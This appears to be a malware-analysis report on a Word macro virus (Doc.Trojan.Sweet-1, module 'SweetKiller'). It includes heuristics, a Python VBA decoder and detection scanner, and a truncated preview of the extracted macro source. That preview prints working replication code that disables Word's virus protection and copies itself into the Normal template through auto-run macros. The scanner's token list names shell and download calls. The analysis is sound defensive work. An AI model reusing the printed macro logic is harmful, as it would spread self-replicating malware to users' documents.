MALICIOUS
Risk Score: 340
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample carries a legacy WordBasic auto-execution marker alongside a VBA project whose module, named SweetKiller, defines AutoOpen, AutoClose and AutoNew handlers (the heuristics additionally report an Auto_Close marker), so the code runs as soon as the document is opened, closed, or used to create a new document. A Shell() call in the VBA (a critical heuristic; it lies beyond the truncated preview below), combined with the ClamAV signature Doc.Trojan.Sweet-1, indicates that the macros are designed to execute arbitrary commands. The recovered source declares GDI drawing APIs and registry APIs (RegCreateKey, RegSetValueEx), switches off Word's macro virus warning (Options.VirusProtection = False) and the Normal-template save prompt, and uses Application.OrganizerCopy to copy the SweetKiller module between the Normal template and the active document, which is the replication pattern of a classic Word macro virus. A TimeReached() function returns True only on 8 December; its caller is past the truncation. The Shell() call is the likely vehicle for any secondary payload.
Heuristics (7)
- ClamAV: Doc.Trojan.Sweet-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Sweet-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
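To show what sits behind the macro heuristics above and behind the macros.bas artifact, here is an added example that is not code from this analyzer or from oletools: a self-contained decoder for the MS-OVBA compressed container (the encoding in which VBA module source is stored, and which olevba decodes to produce the decoded VBA source), a reference encoder used only to build test input offline, and a source-level form of the auto-exec plus execution-token rule together with the replication markers visible in the SweetKiller source (VirusProtection off, OrganizerCopy, registry API declarations). The SAMPLE_VBA text is constructed for the example; its Shell line is invented, since the page's preview is truncated before the Shell() call the heuristic reports. The regex token lists are the author's assumptions, not the analyzer's rule set, and the p-code-only case (OLE_VBA_PCODE_AUTOEXEC_EXEC) needs a p-code disassembler and is not covered.

```python
import re

AUTOEXEC_RE = re.compile(r"\b(AutoOpen|AutoClose|AutoNew|AutoExec|Auto_Open|Auto_Close"
                         r"|Document_Open|Document_Close|Workbook_Open)\b", re.I)
EXEC_RE = re.compile(r"\b(Shell|ShellExecute|WScript\.Shell|CreateObject|GetObject"
                     r"|URLDownloadToFile|CallByName)\b", re.I)
MARKERS = {  # replication and defence-evasion behaviour visible in the SweetKiller source
    "virus_protection_disabled": r"Options\.VirusProtection\s*=\s*False",
    "normal_template_infection": r"\bOrganizerCopy\b",
    "registry_api_declared": r"Declare\s+Function\s+Reg(?:CreateKey|SetValueEx|OpenKey)",
}

def decompress_container(buf: bytes) -> bytes:
    """Decode an MS-OVBA CompressedContainer: 0x01 signature, then 4 KiB chunks."""
    if not buf or buf[0] != 0x01: raise ValueError("missing MS-OVBA signature byte")
    out, pos = bytearray(), 1
    while pos < len(buf):
        header = int.from_bytes(buf[pos:pos + 2], "little")
        if (header >> 12) & 0x7 != 0b011: raise ValueError("bad chunk signature bits")
        chunk_end, chunk_start, pos = pos + (header & 0xFFF) + 3, len(out), pos + 2
        if not header & 0x8000:              # raw chunk: 4096 literal bytes, no tokens
            out += buf[pos:pos + 4096]; pos = chunk_end; continue
        while pos < chunk_end:               # flag byte, then up to 8 tokens
            flags, pos = buf[pos], pos + 1
            for bit in range(8):
                if pos >= chunk_end: break
                if not flags >> bit & 1:     # literal token: one byte
                    out.append(buf[pos]); pos += 1; continue
                token = int.from_bytes(buf[pos:pos + 2], "little"); pos += 2
                # copy token: offset/length bit split grows with distance into the chunk
                bit_count = max((len(out) - chunk_start - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                src = len(out) - ((token >> (16 - bit_count)) + 1)
                for i in range(length):      # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)

def _longest_match(chunk: bytes, pos: int) -> tuple:
    """Greedy back-reference search within the spec's per-position window and length limits."""
    if pos == 0: return 0, 0
    bit_count = max((pos - 1).bit_length(), 4)
    max_len, best = min((0xFFFF >> bit_count) + 3, len(chunk) - pos), (0, 0)
    for off in range(1, min(pos, 1 << bit_count) + 1):
        n = 0
        while n < max_len and chunk[pos + n] == chunk[pos - off + n]: n += 1
        if n > best[1]: best = (off, n)
    return best

def compress_container(data: bytes) -> bytes:
    """Reference encoder: O(n*window), emits compressed chunks only (no raw-chunk fallback)."""
    out = bytearray([0x01])
    for start in range(0, len(data), 4096):
        chunk, body, pos = data[start:start + 4096], bytearray(), 0
        while pos < len(chunk):
            flags, group = 0, bytearray()
            for bit in range(8):
                if pos >= len(chunk): break
                off, length = _longest_match(chunk, pos)
                if length >= 3:              # a copy token pays off from 3 bytes up
                    bit_count = max((pos - 1).bit_length(), 4)
                    group += (((off - 1) << (16 - bit_count)) | (length - 3)).to_bytes(2, "little")
                    flags |= 1 << bit; pos += length
                else:
                    group.append(chunk[pos]); pos += 1
            body.append(flags); body += group
        if len(body) > 4096: raise ValueError("chunk did not shrink; a raw chunk would be needed")
        out += (0xB000 | (len(body) - 1)).to_bytes(2, "little") + body  # 0b1011 = compressed + sig
    return bytes(out)

def scan_vba_source(src: str) -> dict:
    """Source-level form of the auto-exec + execution-token heuristic, plus SweetKiller markers."""
    autoexec = list(dict.fromkeys(m.group(1) for m in AUTOEXEC_RE.finditer(src)))
    execs = list(dict.fromkeys(m.group(1) for m in EXEC_RE.finditer(src)))
    markers = [k for k, pat in MARKERS.items() if re.search(pat, src)]
    verdict = ("auto-exec + execution token" if autoexec and execs
               else "auto-exec only" if autoexec else "no auto-exec macro")
    return {"autoexec": autoexec, "exec": execs, "markers": markers, "verdict": verdict}

# Constructed sample shaped like the recovered SweetKiller module. The Shell line is
# invented for the example (the page's preview is truncated before its Shell() call).
SAMPLE_VBA = b"""Attribute VB_Name = "SweetKiller"
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long) As Long
Sub AutoOpen()
    Options.VirusProtection = False
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="SweetKiller", Object:=wdOrganizerObjectProjectItems
End Sub
Sub AutoClose()
    Shell Environ("COMSPEC") & " /c echo constructed", vbHide
End Sub
"""

if __name__ == "__main__":
    print(scan_vba_source(decompress_container(compress_container(SAMPLE_VBA)).decode("latin-1")))
```

A hand-built container is a useful sanity check for the decoder: the bytes `01 05 B0 08 61 62 63 03 20` are one compressed chunk holding three literals and a copy token with offset 3 and length 6, and decode to `abcabcabc`. In a real document the compressed source begins at the module's TextOffset inside its stream in the VBA storage; olevba already performs this step, so the decoder here is for understanding and cross-checking the macros.bas artifact, and the token scan is the visible-source counterpart of the p-code heuristic, which will still fire when the source part has been stripped.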
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17660 bytes |

SHA-256: f1bb32e41c422bd14dc62e056876de6423d492913b352375c954d07d0e3bf5c0
Detection: ClamAV: Doc.Trojan.Sweet-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SweetKiller"
Dim MainWindow As Long
Dim MainWindowDC As Long
Dim Pen As Long
Dim Brush As Long
Dim WindowsDir As String * 50
Dim ExitCommand As String
Type LOGFONT
lfHeight As Long
lfWidth As Long
lfEscapement As Long
lfOrientation As Long
lfWeight As Long
lfItalic As Byte
lfUnderline As Byte
lfStrikeOut As Byte
lfCharSet As Byte
lfOutPrecision As Byte
lfClipPrecision As Byte
lfQuality As Byte
lfPitchAndFamily As Byte
lfFaceName(50) As Byte
End Type
Dim MyFont As LOGFONT
Declare Function CreateFontIndirect Lib "gdi32" Alias "CreateFontIndirectA" (lpLogFont As LOGFONT) As Long
Declare Function SetTextColor Lib "gdi32" (ByVal hdc As Long, ByVal crColor As Long) As Long
Declare Function SetBkColor Lib "gdi32" (ByVal hdc As Long, ByVal crColor As Long) As Long
Declare Function GetActiveWindow Lib "user32" () As Long
Declare Function GetWindowDC Lib "user32" (ByVal hwnd As Long) As Long
Declare Function Rectangle Lib "gdi32" (ByVal hdc As Long, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal x As Long, ByVal y As Long, ByVal lpString As String, ByVal nCount As Long) As Long
Declare Function CreatePen Lib "gdi32" (ByVal nPenStyle As Long, ByVal nWidth As Long, ByVal crColor As Long) As Long
Declare Function CreateSolidBrush Lib "gdi32" (ByVal crColor As Long) As Long
Declare Function SelectObject Lib "gdi32" (ByVal hdc As Long, ByVal hObject As Long) As Long
Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Function TimeReached() As Boolean
If Month(Now) = 12 And Day(Now) = 8 Then
TimeReached = True
Else
TimeReached = False
End If
End Function
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Create By SweetKiller "
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.SweetKiller.AutoOpen"
If Not InDocument() Then
GoInIt
Else
OutBreak
End If
End Sub
Sub AutoClose()
Attribute AutoClose.VB_Description = "Created by SweetKiller"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.SweetKiller.AutoClose"
If Not InDocument() Then
GoInIt
Else
OutBreak
End If
End Sub
Sub AutoNew()
If Not InDocument() Then
GoInIt
Else
OutBreak
End If
End Sub
Function InDocument() As Boolean
Dim item
InDocument = False
For Each item In ActiveDocument.VBProject.VBComponents
If item.Name = "SweetKiller" Then InDocument = True
Next
End Function
Function InTemplate() As Boolean
Dim item
InTemplate = False
For Each item In NormalTemplate.VBProject.VBComponents
If item.Name = "SweetKiller" Then InTemplate = True
Next
End Function
Sub GoInIt()
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="SweetKiller", Object:=wdOrganizerObjectProjectItems
End Sub
Sub OutBreak()
Options.VirusProtection = False
Options.Sa
... (truncated)